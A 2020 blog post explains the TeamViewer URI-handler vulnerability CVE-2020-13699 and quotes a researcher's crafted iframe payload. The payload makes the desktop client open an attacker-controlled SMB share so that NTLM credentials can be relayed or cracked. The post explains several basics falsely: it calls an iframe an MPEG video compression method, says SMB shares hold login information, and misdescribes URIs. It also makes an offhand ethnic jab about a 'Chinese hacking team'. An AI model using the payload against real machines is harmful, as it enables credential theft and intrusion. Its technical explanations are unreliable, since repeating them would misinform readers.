TeamViewer’s New Exploit Is Riskier Than You Might Think

78

TeamViewer exploit

 

TeamViewer’s New Exploit Is Riskier Than You Might Think


TeamViewer is a popular Remote Desktop Software. It allows it’s users to connect to remote computers via the internet and control them or transfer files from them. But a newly discovered exploit in this program allows hackers to gain access to the computers instead, which can lead to bigger problems like malware or ransomware.

This is a URI exploit, URI is defined as “Short for Uniform Resource Identifier, the generic term for all types of names and addresses that refer to objects on the World Wide Web“ by the webopedia website. Essentially this exploit used one of these URIs to launch the TeamViewer application and establish a connection between TeamViewer and a hacker. This URI would be provided by the user browsing a website that has a malicious iframe in it. An iframe is “Short for intraframe, a video compression method used by the MPEG standard“. many people use websites that contain videos that might have these malicious iframes in them. We delve into the problem in more detail below.

 

Discovering The Exploit

Jeffery Hoffman is a security engineer currently working with Praetorian Cyber Security group. As he is a computer geek to the max. he has provided a .txt file on the matter explaining how he discovered the exploit and how the exploit operates. The CVE was discovered by him and it was reported soon after, he explains that

 

“An attacker could embed a malicious iframe in a website with a crafted

URL (<iframe src='teamviewer10: --play \attacker-IPsharefake.tvs'>)

that would launch the TeamViewer Windows desktop client and force it to

open a remote SMB share. Windows will perform NTLM authentication when

opening the SMB share and that request can be relayed (using a tool like

responder) for code execution (or captured for hash cracking).”

 an SMB share is essentially the hacker’s key to success as it provides the hacker with a Server Message Block that contains the login information within it. This allows the hacker access to the TeamViewer of the account that has opened the unsecured iframe we talked about earlier with no need for any authentication or password.

This was called the CVE-2020-13699 and it is a particularly dangerous attack as it provides hackers with full access to the computers and the fact that it can be launched remotely is perfect for that Chinese hacking team that wants to infect your computers with all kinds of ransomware.

 

Can You Speak English? I Don’t Understand The Jargon

Well essentially this attack is fairly easy to explain in human language. First of all you won’t even notice it happening because you are busy browsing the web and TeamViewer can always be run in the background without you even noticing. First of all the hacker has to know about the URI  this gives programs permission to do things on your behalf to the computer via the browser, mostly they are harmless and nothing would change in terms of security but when hackers have access to a URI they can write another command instead of what the program normally does. That being said they can use these custom URIs to launch a TeamViewer connection to your system without you noticing. Essentially what happens is that you are browsing the web, you click the wrong link and that’s it congratulations now it’s hunting season and the hackers will try their best to exploit your system and you.

eamviewer_update

The Aftermath of the TeamViewer Security Exploit

After the security exploit was reported thanks to our geeky cyber security expert, the TeamViewer team got a hold of the matter and their community manager has explained that there will be an update for TeamViewer versions 8 through 15 to fix the exploit.  They have released the updated three weeks ago and now TeamViewer is as safe as ever. But if you still are worried about your computer security and don’t want hackers to intrude read on.

With the advancements made both to hacking and computer security in the past decade, somehow specialized devices have come into being that can ensure cyber security in a more sophisticated and catered manner. This is due to the different specializations that have spurred up in the last few years. Remote connection security is one of them and it’s not taken as serious as it should be, we advise you to read this article to get more information on how you can protect your remote desktop connections better.

Published by Blogger at 2020 August 22